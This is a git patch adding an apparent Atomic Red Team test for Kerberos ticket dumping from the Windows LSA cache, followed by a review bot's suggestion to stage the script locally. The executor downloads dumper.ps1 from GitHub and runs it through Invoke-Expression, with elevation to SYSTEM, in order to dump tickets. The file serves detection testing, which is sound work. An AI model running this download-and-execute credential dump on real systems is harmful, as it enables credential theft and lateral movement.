From 4d30f39d6ef01bc15c35fe59ea4dd15a12d24cb0 Mon Sep 17 00:00:00 2001
From: skandler <133157403+skandler@users.noreply.github.com>
Date: Fri, 5 Jul 2024 19:32:19 +0200
Subject: [PATCH] Update T1003.004.yaml (#2835)
* Update T1003.004.yaml
dumping kerberos tickets with dumper.ps1 powershell, by dumping the winlogon.exe
* Update T1003.004.yaml
---------
Co-authored-by: Hare Sudhan
---
 atomics/T1003.004/T1003.004.yaml | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
diff --git a/atomics/T1003.004/T1003.004.yaml b/atomics/T1003.004/T1003.004.yaml
index 264311a7..d2f95b3a 100644
--- a/atomics/T1003.004/T1003.004.yaml
+++ b/atomics/T1003.004/T1003.004.yaml
@@ -30,3 +30,18 @@ atomic_tests:
 cleanup_command: del %temp%\secrets >nul 2> nul
 name: command_prompt
 elevation_required: true
+
+- name: Dump Kerberos Tickets from LSA using dumper.ps1
+
+ description: |
+ This tool allows you to dump Kerberos tickets from the LSA cache. Implemented via Add-Type.
+ If the tool is run as a privileged user, it will automatically obtain NT AUTHORITY\SYSTEM privileges and then dump all tickets. If the tool is run as a non-privileged user, it will only dump tickets from the current logon session.
+ Ref: https://github.com/MzHmO/PowershellKerberos/
+ Author of dumper.ps1: Michael Zhmaylo (@MzHmO)
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1')
+ name: powershell
+ elevation_required: true
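Review bot: The new test's `command` fetches dumper.ps1 at execution time and hands the string straight to `Invoke-Expression`, with no `dependencies` entry, so a network or proxy failure surfaces as a PowerShell error inside the test rather than as an unmet prerequisite and the test cannot be run offline; the commit-pinned URL is the only integrity control on what gets executed. Staging the pinned script through a `dependency_executor_name`/`dependencies` block with a `prereq_command` and `get_prereq_command`, then running the local copy (assuming dumper.ps1 is self-executing when invoked as a file — confirm), would match the framework's usual pattern and keep the executor line free of download logic. The `description` should also say what the detection side can expect: the download is a WebClient request from the powershell process, and `Add-Type` in Windows PowerShell compiles through csc.exe and leaves transient source and assembly files in the user's temp folder (verify for the version under test) — one sentence naming those artifacts tells analysts which telemetry the test is meant to exercise. The enclosing `atomic_tests` sequence starts before this hunk; only the tail of the previous entry is visible here.
```yaml
- name: Dump Kerberos Tickets from LSA using dumper.ps1
  # … unchanged: description, supported_platforms …
  # <LOCAL_SCRIPT_PATH> is a placeholder for the project's staging path under PathToAtomicsFolder
  dependency_executor_name: powershell
  dependencies:
  - description: |
      dumper.ps1 (pinned commit) must be staged locally
    prereq_command: |
      if (Test-Path "<LOCAL_SCRIPT_PATH>") {exit 0} else {exit 1}
    get_prereq_command: |
      Invoke-WebRequest "https://raw.githubusercontent.com/MzHmO/PowershellKerberos/beed52acda37fc531ef0cb4df3fc2eb63a74bbb8/dumper.ps1" -OutFile "<LOCAL_SCRIPT_PATH>"
  executor:
    command: |
      & "<LOCAL_SCRIPT_PATH>"
    name: powershell
  elevation_required: true
```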